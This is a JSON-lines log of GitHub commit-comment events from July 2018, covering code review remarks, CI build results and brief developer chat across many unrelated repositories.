{"id":"7959403033","type":"CommitCommentEvent","actor":{"login":"queer"},"repo":{"name":"Mantaro/MantaroBot"},"payload":{"comment":{"id":29693091,"position":null,"line":null,"path":null,"commit_id":"ab21d9147bf3270bf5395f86332dc36e90c6a4d0","created_at":"2018-07-13T00:32:51Z","updated_at":"2018-07-13T00:32:51Z","author_association":"CONTRIBUTOR","body":"HOLY POGGERS"}},"created_at":"2018-07-13T00:32:51Z"}
{"id":"7959403625","type":"CommitCommentEvent","actor":{"login":"fernomac"},"repo":{"name":"aws/aws-sdk-java"},"payload":{"comment":{"id":29693096,"position":5,"line":175,"path":"aws-java-sdk-s3/src/main/java/com/amazonaws/services/s3/internal/S3AbortableInputStream.java","commit_id":"f2a5b6414660a387a276d769efd074831535f817","created_at":"2018-07-13T00:33:08Z","updated_at":"2018-07-13T00:33:08Z","author_association":"CONTRIBUTOR","body":"@shorea FYI, looks like this got reverted (accidentally dropped in the merge to the internal repository?), so the SDK is not building with JDK 1.9+."}},"created_at":"2018-07-13T00:33:08Z"}
{"id":"7959404648","type":"CommitCommentEvent","actor":{"login":"THREEhundo"},"repo":{"name":"THREEhundo/hello-world"},"payload":{"comment":{"id":29693099,"position":null,"line":null,"path":null,"commit_id":"00136ba13c020d6b478fe54826a1892c44232fbe","created_at":"2018-07-13T00:33:36Z","updated_at":"2018-07-13T00:33:36Z","author_association":"OWNER","body":"Hello hello!"}},"created_at":"2018-07-13T00:33:36Z"}
{"id":"7959405211","type":"CommitCommentEvent","actor":{"login":"ASliceOfHammy"},"repo":{"name":"Mantaro/MantaroBot"},"payload":{"comment":{"id":29693101,"position":null,"line":null,"path":null,"commit_id":"ab21d9147bf3270bf5395f86332dc36e90c6a4d0","created_at":"2018-07-13T00:33:51Z","updated_at":"2018-07-13T00:33:51Z","author_association":"NONE","body":"coggers"}},"created_at":"2018-07-13T00:33:51Z"}
{"id":"7959407277","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29693105,"position":null,"line":null,"path":null,"commit_id":"5ff8faa4c17f5d2e8c4b5881df3dad848f5d8a4d","created_at":"2018-07-13T00:34:44Z","updated_at":"2018-07-13T00:34:44Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/5ff8faa4c17f5d2e8c4b5881df3dad848f5d8a4d/index.html"}},"created_at":"2018-07-13T00:34:44Z"}
{"id":"7959408871","type":"CommitCommentEvent","actor":{"login":"THREEhundo"},"repo":{"name":"THREEhundo/hello-world"},"payload":{"comment":{"id":29693109,"position":1,"line":1,"path":"README.md","commit_id":"00136ba13c020d6b478fe54826a1892c44232fbe","created_at":"2018-07-13T00:35:27Z","updated_at":"2018-07-13T00:35:27Z","author_association":"OWNER","body":"asd\r\n"}},"created_at":"2018-07-13T00:35:27Z"}
{"id":"7959410456","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29693112,"position":null,"line":null,"path":null,"commit_id":"417a0bacb5889f80ef7a5e36df8d00d4298076fc","created_at":"2018-07-13T00:36:10Z","updated_at":"2018-07-13T00:36:10Z","author_association":"NONE","body":"issue_#6803 (mbadams5) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-417a0bacb5889f80ef7a5e36df8d00d4298076fc-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-13T00:36:10Z"}
{"id":"7959411970","type":"CommitCommentEvent","actor":{"login":"MartianLee"},"repo":{"name":"parti-xyz/catan-web"},"payload":{"comment":{"id":29693115,"position":null,"line":null,"path":null,"commit_id":"da7957d9cfe94910344d7307a06e7872c9e76953","created_at":"2018-07-13T00:36:49Z","updated_at":"2018-07-13T00:36:49Z","author_association":"CONTRIBUTOR","body":"폴더 안에서 위키 갯수만 보여주게 되어 있어서 위키로 써 보았습니다. 어떤 제목이 좋을까요 흠..."}},"created_at":"2018-07-13T00:36:49Z"}
{"id":"7959413143","type":"CommitCommentEvent","actor":{"login":"boorad"},"repo":{"name":"convoyinc/apollo-cache-hermes"},"payload":{"comment":{"id":29693116,"position":null,"line":null,"path":null,"commit_id":"045d2a0b28effb54c57bc78e5770eee05793e7d4","created_at":"2018-07-13T00:37:21Z","updated_at":"2018-07-13T00:37:21Z","author_association":"NONE","body":"@nevir your work-around gets past the error, but doesn't update my UI's that are supposedly subscribed to the cache changes (I thought for `getGame`.  Although I do have a convoluted path through the components, which I fear is the issue.  I still may not have the hang of this GraphQL and Apollo thinking yet."}},"created_at":"2018-07-13T00:37:21Z"}
{"id":"7959414060","type":"CommitCommentEvent","actor":{"login":"dalikim"},"repo":{"name":"parti-xyz/catan-web"},"payload":{"comment":{"id":29693120,"position":null,"line":null,"path":null,"commit_id":"da7957d9cfe94910344d7307a06e7872c9e76953","created_at":"2018-07-13T00:37:43Z","updated_at":"2018-07-13T00:37:43Z","author_association":"CONTRIBUTOR","body":"우선 이상태로 더 써보죠. "}},"created_at":"2018-07-13T00:37:43Z"}
{"id":"7959425665","type":"CommitCommentEvent","actor":{"login":"MartianLee"},"repo":{"name":"parti-xyz/catan-web"},"payload":{"comment":{"id":29693136,"position":null,"line":null,"path":null,"commit_id":"af3839ec1410cbc13a5fe7a53d74f21a9906933d","created_at":"2018-07-13T00:42:42Z","updated_at":"2018-07-13T00:42:42Z","author_association":"CONTRIBUTOR","body":"보통 if를 먼저 쓰게 되어있군요. 감사합니다.\r\n그리고 present? any? exists?가 미묘한 차이가 있네요 !!\r\nhttps://www.ombulabs.com/blog/benchmark/performance/rails/present-vs-any-vs-exists.html"}},"created_at":"2018-07-13T00:42:42Z"}
{"id":"7959429942","type":"CommitCommentEvent","actor":{"login":"PeterMorganGH"},"repo":{"name":"PeterMorganGH/javascript-exercises"},"payload":{"comment":{"id":29693146,"position":null,"line":null,"path":null,"commit_id":"fb159c8dc732d0b3dacb6556e5789fbe1b647a34","created_at":"2018-07-13T00:44:30Z","updated_at":"2018-07-13T00:44:30Z","author_association":"OWNER","body":"Moved CoffeeScript files to their own repo at https://github.com/PeterMorganGH/coffeescript-exercises"}},"created_at":"2018-07-13T00:44:30Z"}
{"id":"7959430117","type":"CommitCommentEvent","actor":{"login":"eraffxi"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":29693147,"position":null,"line":null,"path":null,"commit_id":"307321244b9a477f5c925f13ef63ff14012abdbe","created_at":"2018-07-13T00:44:34Z","updated_at":"2018-07-13T00:44:34Z","author_association":"CONTRIBUTOR","body":"still not able to teleport across multi servers"}},"created_at":"2018-07-13T00:44:34Z"}
{"id":"7959438136","type":"CommitCommentEvent","actor":{"login":"TeoTwawki"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":29693170,"position":null,"line":null,"path":null,"commit_id":"307321244b9a477f5c925f13ef63ff14012abdbe","created_at":"2018-07-13T00:48:08Z","updated_at":"2018-07-13T00:48:08Z","author_association":"MEMBER","body":"@takhlaq what brokeded here bouts"}},"created_at":"2018-07-13T00:48:08Z"}
{"id":"7959439598","type":"CommitCommentEvent","actor":{"login":"auppunda"},"repo":{"name":"auppunda/terraform-provider-vcd"},"payload":{"comment":{"id":29693172,"position":null,"line":null,"path":null,"commit_id":"a644414ae6f5e3bddd027995d12c92ccb05d361c","created_at":"2018-07-13T00:48:44Z","updated_at":"2018-07-13T00:48:44Z","author_association":"OWNER","body":"Alright, this class right now didn't solve the problem but it abstracted parts of the admin calls so that later on it can be easier to change the structure. As of right now a vcdClient can have a system class if it has admin credentials. I need to add it to the provider as well, a is_admin entry to check whether the user wants an admin token. Otherwise using the org resource will fail. This is a fool proof way of allowing users to also use terraform, but also enable admins to create, modify and delete orgs"}},"created_at":"2018-07-13T00:48:44Z"}
{"id":"7959440221","type":"CommitCommentEvent","actor":{"login":"TeoTwawki"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":29693175,"position":null,"line":null,"path":null,"commit_id":"307321244b9a477f5c925f13ef63ff14012abdbe","created_at":"2018-07-13T00:49:00Z","updated_at":"2018-07-13T00:49:00Z","author_association":"MEMBER","body":"Oh its prolly coz.. get name shiz ain't it"}},"created_at":"2018-07-13T00:49:00Z"}
{"id":"7959444123","type":"CommitCommentEvent","actor":{"login":"T1S0N"},"repo":{"name":"perl6/nqp"},"payload":{"comment":{"id":29693180,"position":null,"line":null,"path":null,"commit_id":"60f07ed644cfa4e28610458f4b689599cf14d3dc","created_at":"2018-07-13T00:50:39Z","updated_at":"2018-07-13T00:50:39Z","author_association":"MEMBER","body":"fix typo in bdaeaaf6474aa0fe057791c1b38e4d0ec6fe2faa"}},"created_at":"2018-07-13T00:50:39Z"}
{"id":"7959444643","type":"CommitCommentEvent","actor":{"login":"SnehaAdumulla"},"repo":{"name":"SnehaAdumulla/Parsing-a-txt-file-in-python"},"payload":{"comment":{"id":29693181,"position":null,"line":null,"path":null,"commit_id":"4eb70d4387f3716a18708717a52d9868c3d7cc71","created_at":"2018-07-13T00:50:53Z","updated_at":"2018-07-13T00:50:53Z","author_association":"OWNER","body":"done"}},"created_at":"2018-07-13T00:50:53Z"}
{"id":"7959445462","type":"CommitCommentEvent","actor":{"login":"DerekRoberts"},"repo":{"name":"bcgov/gwells"},"payload":{"comment":{"id":29693184,"position":null,"line":null,"path":null,"commit_id":"331c76cd703220ea9bf237388a1d9902d9d6f4dd","created_at":"2018-07-13T00:51:14Z","updated_at":"2018-07-13T00:51:14Z","author_association":"MEMBER","body":"@garywong-bc That'll be the plan soon enough!"}},"created_at":"2018-07-13T00:51:14Z"}
{"id":"7959446567","type":"CommitCommentEvent","actor":{"login":"MuhammadHinnawi"},"repo":{"name":"MuhammadHinnawi/FreeBandicamRegisteration"},"payload":{"comment":{"id":29693188,"position":4,"line":4,"path":"README.md","commit_id":"2c324b61066f1bb3252dd2b035b14f34ad61160e","created_at":"2018-07-13T00:51:43Z","updated_at":"2018-07-13T00:51:43Z","author_association":"OWNER","body":"Extract it\r\n"}},"created_at":"2018-07-13T00:51:43Z"}
{"id":"7959447948","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29693191,"position":null,"line":null,"path":null,"commit_id":"ae85b3a52bfdbc3acf60fc6b707063f92655d407","created_at":"2018-07-13T00:52:17Z","updated_at":"2018-07-13T00:52:17Z","author_association":"OWNER","body":"Build version: __`0.10.0-renovate/node-8.11.328`__ :crossed_fingers: [`renovate/node-8.11`](https://github.com/streamich/ci-scripts/tree/renovate/node-8.11) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/403365493) :tada:"}},"created_at":"2018-07-13T00:52:17Z"}
{"id":"7959449986","type":"CommitCommentEvent","actor":{"login":"spwilson2"},"repo":{"name":"ekivolowitz/curl"},"payload":{"comment":{"id":29693192,"position":1,"line":1,"path":"README","commit_id":"ee394336dbdfd8523597fc4653ab186c47d51469","created_at":"2018-07-13T00:53:09Z","updated_at":"2018-07-13T00:53:09Z","author_association":"NONE","body":":O"}},"created_at":"2018-07-13T00:53:09Z"}
{"id":"7959453935","type":"CommitCommentEvent","actor":{"login":"WhatifNick"},"repo":{"name":"WhatifNick/GYG-MERN-PROJECT"},"payload":{"comment":{"id":29693199,"position":null,"line":null,"path":null,"commit_id":"38b4c02a05b94f2a1ff1d5e5cabcffb14f6d9c10","created_at":"2018-07-13T00:54:50Z","updated_at":"2018-07-13T00:54:50Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [As a User, ISBAT enter my name, company, address, phone number, and email.](https://trello.com/c/zTBhxReI/24-as-a-user-isbat-enter-my-name-company-address-phone-number-and-email)"}},"created_at":"2018-07-13T00:54:50Z"}
{"id":"7959457222","type":"CommitCommentEvent","actor":{"login":"Rakesh6720"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29693212,"position":35,"line":35,"path":"Vidly/Views/Customers/Index.cshtml","commit_id":"b727a26e1b4b88abe84a8b48208fec537db2ed43","created_at":"2018-07-13T00:56:12Z","updated_at":"2018-07-13T00:56:12Z","author_association":"NONE","body":"I understand in the ActionLink at the bottom of the Index razor page that \"Details\" corresponds to the action method on the Customer controller.  However, What is the parameter that customer.Name corresponds to?"}},"created_at":"2018-07-13T00:56:12Z"}
{"id":"7959462331","type":"CommitCommentEvent","actor":{"login":"renanramoslinhares"},"repo":{"name":"renanramoslinhares/primeiro-projeto"},"payload":{"comment":{"id":29693230,"position":5,"line":2,"path":"src/app/cursos/curso-detalhe/curso-detalhe.component.html","commit_id":"0097b1bfae52885e0fe5e9999148e22af853cc5d","created_at":"2018-07-13T00:58:19Z","updated_at":"2018-07-13T00:58:19Z","author_association":"OWNER","body":"teste"}},"created_at":"2018-07-13T00:58:19Z"}
{"id":"7959463114","type":"CommitCommentEvent","actor":{"login":"renanramoslinhares"},"repo":{"name":"renanramoslinhares/primeiro-projeto"},"payload":{"comment":{"id":29693234,"position":4,"line":1,"path":"src/app/cursos/curso-detalhe/curso-detalhe.component.html","commit_id":"0097b1bfae52885e0fe5e9999148e22af853cc5d","created_at":"2018-07-13T00:58:38Z","updated_at":"2018-07-13T00:58:38Z","author_association":"OWNER","body":"Zz."}},"created_at":"2018-07-13T00:58:38Z"}
{"id":"7959467315","type":"CommitCommentEvent","actor":{"login":"dalikim"},"repo":{"name":"parti-xyz/govcraft"},"payload":{"comment":{"id":29693248,"position":5,"line":53,"path":"app/controllers/concerns/statementing.rb","commit_id":"310bb5ee0051b7a671337afb83a4acefdbabd311","created_at":"2018-07-13T01:00:20Z","updated_at":"2018-07-13T01:00:20Z","author_association":"CONTRIBUTOR","body":"@MartianLee 여기에서 오류가 발생하네요. 제가 해결해 보겠습니다."}},"created_at":"2018-07-13T01:00:20Z"}
{"id":"7959470818","type":"CommitCommentEvent","actor":{"login":"RayDy143"},"repo":{"name":"RayDy143/OES"},"payload":{"comment":{"id":29693252,"position":4,"line":61,"path":"application/config/autoload.php","commit_id":"a12ea8cecef7914ba2cc4c83d4c04da79e14b167","created_at":"2018-07-13T01:01:43Z","updated_at":"2018-07-13T01:01:43Z","author_association":"OWNER","body":"ibalik gud ni nga code sayup imong code kay advance ni"}},"created_at":"2018-07-13T01:01:43Z"}
{"id":"7959472529","type":"CommitCommentEvent","actor":{"login":"devontheriault"},"repo":{"name":"devontheriault/Playing"},"payload":{"comment":{"id":29693254,"position":null,"line":null,"path":null,"commit_id":"64efc9194de691c4d8dde7171132207bfc289c04","created_at":"2018-07-13T01:02:25Z","updated_at":"2018-07-13T01:02:25Z","author_association":"OWNER","body":"This does not work...\r\n"}},"created_at":"2018-07-13T01:02:25Z"}
{"id":"7959477304","type":"CommitCommentEvent","actor":{"login":"vinayakapawar"},"repo":{"name":"ktgnair/OS-MSK_PPBC_Export"},"payload":{"comment":{"id":29693273,"position":60,"line":60,"path":"src/main/java/com/krishagni/openspecimen/DistributionProtocolExport.java","commit_id":"b3d06c3393725ab09a8d941ef632338ca32c1a71","created_at":"2018-07-13T01:04:26Z","updated_at":"2018-07-13T01:04:26Z","author_association":"NONE","body":"These longer lines should be broken as below for better clarity/readability:\r\n\r\n`\r\nDpListCriteria listCrit = new DpListCriteria().startAt(startAt).maxResults(maxRecs);\r\nList<DistributionProtocol> dps = daoFactory.getDistributionProtocolDao().getDistributionProtocols(listCrit);\r\n`"}},"created_at":"2018-07-13T01:04:26Z"}
{"id":"7959481341","type":"CommitCommentEvent","actor":{"login":"vinayakapawar"},"repo":{"name":"ktgnair/OS-MSK_PPBC_Export"},"payload":{"comment":{"id":29693285,"position":66,"line":66,"path":"src/main/java/com/krishagni/openspecimen/DistributionProtocolExport.java","commit_id":"b3d06c3393725ab09a8d941ef632338ca32c1a71","created_at":"2018-07-13T01:06:08Z","updated_at":"2018-07-13T01:06:08Z","author_association":"NONE","body":"The timestamp is a single word. Accordingly, the variable name will be \"timestamp\"."}},"created_at":"2018-07-13T01:06:08Z"}
{"id":"7959482024","type":"CommitCommentEvent","actor":{"login":"MasterDuke17"},"repo":{"name":"perl6/nqp"},"payload":{"comment":{"id":29693286,"position":null,"line":null,"path":null,"commit_id":"bdaeaaf6474aa0fe057791c1b38e4d0ec6fe2faa","created_at":"2018-07-13T01:06:22Z","updated_at":"2018-07-13T01:06:22Z","author_association":"CONTRIBUTOR","body":"Oops, thanks!"}},"created_at":"2018-07-13T01:06:22Z"}
{"id":"7959483143","type":"CommitCommentEvent","actor":{"login":"xlzwzn"},"repo":{"name":"xlzwzn/xiaomiapp"},"payload":{"comment":{"id":29693289,"position":null,"line":null,"path":null,"commit_id":"0f58e5178f6364d885b3d7dcd2418f4295694504","created_at":"2018-07-13T01:06:50Z","updated_at":"2018-07-13T01:06:50Z","author_association":"OWNER","body":"小修改"}},"created_at":"2018-07-13T01:06:50Z"}
{"id":"7959484638","type":"CommitCommentEvent","actor":{"login":"reffort"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29693291,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-13T01:07:31Z","updated_at":"2018-07-13T01:07:31Z","author_association":"CONTRIBUTOR","body":"There is probably nothing imminent with selecting a naming scheme or even with selecting a way to develop it.  Some things will actually be *more* compatible with traditional troff and less like groff; some groff things will likely be incorporated directly (without a mode switch) where it makes sense.  One of the things I want to try to avoid is having different (unlike) behaviors depending on some setting or other."}},"created_at":"2018-07-13T01:07:31Z"}
{"id":"7959485530","type":"CommitCommentEvent","actor":{"login":"vinayakapawar"},"repo":{"name":"ktgnair/OS-MSK_PPBC_Export"},"payload":{"comment":{"id":29693296,"position":70,"line":70,"path":"src/main/java/com/krishagni/openspecimen/DistributionProtocolExport.java","commit_id":"b3d06c3393725ab09a8d941ef632338ca32c1a71","created_at":"2018-07-13T01:07:55Z","updated_at":"2018-07-13T01:07:55Z","author_association":"NONE","body":"Same here. Break this into multiple statements:\r\n`File outputFile = new File(getDataDir(), \"DistributionProtocols_\" + timestamp + \".csv\");`\r\n`return CsvFileWriter.createCsvFileWriter(outputFile);`\r\n"}},"created_at":"2018-07-13T01:07:55Z"}
{"id":"7959487931","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29693303,"position":null,"line":null,"path":null,"commit_id":"417a0bacb5889f80ef7a5e36df8d00d4298076fc","created_at":"2018-07-13T01:08:58Z","updated_at":"2018-07-13T01:08:58Z","author_association":"NONE","body":"issue_#6803 (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: Tests Failed (1466 of 1684 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nDataSetFixture Test Summary\n * Passed: 37\n * Failed: 2\n\nEnergyPlusFixture Test Summary\n * Passed: 447\n * Failed: 191\n * OTHER_FAULT: 7\n\nInputProcessorFixture Test Summary\n * Passed: 40\n * Failed: 9\n\nSQLiteFixture Test Summary\n * Passed: 65\n * Failed: 3\n\nZoneUnitarySystemTest Test Summary\n * Passed: 3\n * Failed: 4\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-417a0bacb5889f80ef7a5e36df8d00d4298076fc-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-417a0bacb5889f80ef7a5e36df8d00d4298076fc-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-87.05%25-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-417a0bacb5889f80ef7a5e36df8d00d4298076fc-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-20.01%25-green.png)</a>\n"}},"created_at":"2018-07-13T01:08:58Z"}
{"id":"7959490792","type":"CommitCommentEvent","actor":{"login":"vinayakapawar"},"repo":{"name":"ktgnair/OS-MSK_PPBC_Export"},"payload":{"comment":{"id":29693308,"position":80,"line":80,"path":"src/main/java/com/krishagni/openspecimen/DistributionProtocolExport.java","commit_id":"b3d06c3393725ab09a8d941ef632338ca32c1a71","created_at":"2018-07-13T01:10:14Z","updated_at":"2018-07-13T01:10:14Z","author_association":"NONE","body":"1. The array elements should be one indentation stop more from the return keyword.\r\n2. The closing parenthesis should be vertically aligned with the start of the return keyword."}},"created_at":"2018-07-13T01:10:14Z"}
{"id":"7959490801","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29693309,"position":null,"line":null,"path":null,"commit_id":"dc2fc3994f93274ddce3cef6177a1b5ecb0c5863","created_at":"2018-07-13T01:10:15Z","updated_at":"2018-07-13T01:10:15Z","author_association":"NONE","body":"kiva-non-quad-walls (mjwitte) - Win64-Windows-7-VisualStudio-14: OK (2934 of 2934 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-13T01:10:15Z"}
{"id":"7959494005","type":"CommitCommentEvent","actor":{"login":"vinayakapawar"},"repo":{"name":"ktgnair/OS-MSK_PPBC_Export"},"payload":{"comment":{"id":29693316,"position":57,"line":57,"path":"src/main/java/com/krishagni/openspecimen/DistributionProtocolExport.java","commit_id":"b3d06c3393725ab09a8d941ef632338ca32c1a71","created_at":"2018-07-13T01:11:31Z","updated_at":"2018-07-13T01:11:31Z","author_association":"NONE","body":"The method is exporting multiple DPs. Its name should reflect that and accordingly, it should be named as exportDistributionProtocols()"}},"created_at":"2018-07-13T01:11:31Z"}
{"id":"7959495716","type":"CommitCommentEvent","actor":{"login":"Gyucheon-Heo"},"repo":{"name":"Gyucheon-Heo/mywish-personal-summer2018"},"payload":{"comment":{"id":29693321,"position":null,"line":null,"path":null,"commit_id":"7b791515e8851b0ad30bf3a410a47bf90ca10508","created_at":"2018-07-13T01:12:11Z","updated_at":"2018-07-13T01:12:11Z","author_association":"OWNER","body":"Accident.\r\nRegenerating is done."}},"created_at":"2018-07-13T01:12:11Z"}
{"id":"7959496245","type":"CommitCommentEvent","actor":{"login":"CreatiCoding"},"repo":{"name":"LeonHartley/connection-pool"},"payload":{"comment":{"id":29693323,"position":null,"line":null,"path":null,"commit_id":"d54c3cfade903d5cb80905387a0d8b8f37c5a3f5","created_at":"2018-07-13T01:12:25Z","updated_at":"2018-07-13T01:12:25Z","author_association":"NONE","body":"hello, Can you update about test file with remove boost?"}},"created_at":"2018-07-13T01:12:25Z"}
{"id":"7959498247","type":"CommitCommentEvent","actor":{"login":"ameowlia"},"repo":{"name":"cloudfoundry/cf-networking-release"},"payload":{"comment":{"id":29693328,"position":5,"line":10,"path":"scripts/docker-shell","commit_id":"c5da64db379e7f65d63fec662d3d6e057c1d35bc","created_at":"2018-07-13T01:13:13Z","updated_at":"2018-07-13T01:13:13Z","author_association":"CONTRIBUTOR","body":"@adobley 😢  oops"}},"created_at":"2018-07-13T01:13:13Z"}
{"id":"7959501248","type":"CommitCommentEvent","actor":{"login":"adobley"},"repo":{"name":"cloudfoundry/cf-networking-release"},"payload":{"comment":{"id":29693335,"position":5,"line":10,"path":"scripts/docker-shell","commit_id":"c5da64db379e7f65d63fec662d3d6e057c1d35bc","created_at":"2018-07-13T01:14:29Z","updated_at":"2018-07-13T01:14:29Z","author_association":"MEMBER","body":"We can force over that. It's still in the branch.\n\nOn Thu, Jul 12, 2018, 6:13 PM Amelia Downs <notifications@github.com> wrote:\n\n> @adobley <https://github.com/adobley> 😢 oops\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/cloudfoundry/cf-networking-release/commit/c5da64db379e7f65d63fec662d3d6e057c1d35bc#commitcomment-29693328>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIqv1Yf7Dza_GXOd71PPogU07byKy5vjks5uF_QrgaJpZM4VOJzM>\n> .\n>\n"}},"created_at":"2018-07-13T01:14:29Z"}
{"id":"7959503607","type":"CommitCommentEvent","actor":{"login":"vinayakapawar"},"repo":{"name":"ktgnair/OS-MSK_PPBC_Export"},"payload":{"comment":{"id":29693342,"position":61,"line":61,"path":"src/main/java/com/krishagni/openspecimen/DistributionProtocolExport.java","commit_id":"b3d06c3393725ab09a8d941ef632338ca32c1a71","created_at":"2018-07-13T01:15:29Z","updated_at":"2018-07-13T01:15:29Z","author_association":"NONE","body":"Flushing should happen after writing every chunk of DPs.\r\n`csvWriter.flush()`"}},"created_at":"2018-07-13T01:15:29Z"}
{"id":"7959503804","type":"CommitCommentEvent","actor":{"login":"Manusaran"},"repo":{"name":"Manusaran/Session1"},"payload":{"comment":{"id":29693343,"position":null,"line":null,"path":null,"commit_id":"6a7102e1d4056b2c0732f32a067b5e59dad6daaa","created_at":"2018-07-13T01:15:34Z","updated_at":"2018-07-13T01:15:34Z","author_association":"OWNER","body":"I want all to consider this"}},"created_at":"2018-07-13T01:15:34Z"}
{"id":"7959505386","type":"CommitCommentEvent","actor":{"login":"Juslonluo"},"repo":{"name":"bigsinger/AndroidIdChanger"},"payload":{"comment":{"id":29693346,"position":null,"line":null,"path":null,"commit_id":"aa993d8ba58863e1d922efcd609943a462626bf2","created_at":"2018-07-13T01:16:15Z","updated_at":"2018-07-13T01:16:15Z","author_association":"NONE","body":"sim卡序列号生成的格式不对，希望作者可以修复。"}},"created_at":"2018-07-13T01:16:15Z"}
{"id":"7959506150","type":"CommitCommentEvent","actor":{"login":"jyong2"},"repo":{"name":"jyong2/zephyr"},"payload":{"comment":{"id":29693349,"position":null,"line":null,"path":null,"commit_id":"d472c282643f12d7063bc1cb175b445a8738f3eb","created_at":"2018-07-13T01:16:34Z","updated_at":"2018-07-13T01:16:34Z","author_association":"OWNER","body":"Done, updated in 5237c8a5a71d5f80eced7b8cf0f7b1742c17b883"}},"created_at":"2018-07-13T01:16:34Z"}
{"id":"7959511571","type":"CommitCommentEvent","actor":{"login":"vinayakapawar"},"repo":{"name":"ktgnair/OS-MSK_PPBC_Export"},"payload":{"comment":{"id":29693358,"position":44,"line":44,"path":"src/main/java/com/krishagni/openspecimen/DistributionProtocolExport.java","commit_id":"b3d06c3393725ab09a8d941ef632338ca32c1a71","created_at":"2018-07-13T01:18:49Z","updated_at":"2018-07-13T01:18:49Z","author_association":"NONE","body":"1. The variable name should be plural as we are dealing with multiple records - endOfDistributionProtocols\r\n2. Wherever possible use shorter names without compromising on the readability - endOfDps. If there is no well known shorter form or like that, continue to use longer names."}},"created_at":"2018-07-13T01:18:49Z"}
{"id":"7959511877","type":"CommitCommentEvent","actor":{"login":"fighterG"},"repo":{"name":"fighterG/my-project"},"payload":{"comment":{"id":29693359,"position":null,"line":null,"path":null,"commit_id":"de4f1e83f6bd53467d40bba43038dc9f8394c9e3","created_at":"2018-07-13T01:18:56Z","updated_at":"2018-07-13T01:18:56Z","author_association":"OWNER","body":"很好，学会了。"}},"created_at":"2018-07-13T01:18:56Z"}
{"id":"7959515540","type":"CommitCommentEvent","actor":{"login":"vinayakapawar"},"repo":{"name":"ktgnair/OS-MSK_PPBC_Export"},"payload":{"comment":{"id":29693369,"position":1,"line":1,"path":"src/main/java/com/krishagni/openspecimen/DistributionProtocolExport.java","commit_id":"b3d06c3393725ab09a8d941ef632338ca32c1a71","created_at":"2018-07-13T01:20:24Z","updated_at":"2018-07-13T01:20:24Z","author_association":"NONE","body":"You cannot put the class directly under OpenSpecimen's root package.\r\n\r\ncom.krishagni.openspecimen.msk.pbcc?"}},"created_at":"2018-07-13T01:20:24Z"}
{"id":"7959522879","type":"CommitCommentEvent","actor":{"login":"vinayakapawar"},"repo":{"name":"ktgnair/OS-MSK_PPBC_Export"},"payload":{"comment":{"id":29693378,"position":91,"line":91,"path":"src/main/java/com/krishagni/openspecimen/DistributionProtocolExport.java","commit_id":"b3d06c3393725ab09a8d941ef632338ca32c1a71","created_at":"2018-07-13T01:23:24Z","updated_at":"2018-07-13T01:23:24Z","author_association":"NONE","body":"After doing a couple of exports, you will see that there is some code redundancy. There is a fixed part and then there is a variable part that changes per record type. Try to ensure there is no code duplication of the fixed part."}},"created_at":"2018-07-13T01:23:24Z"}
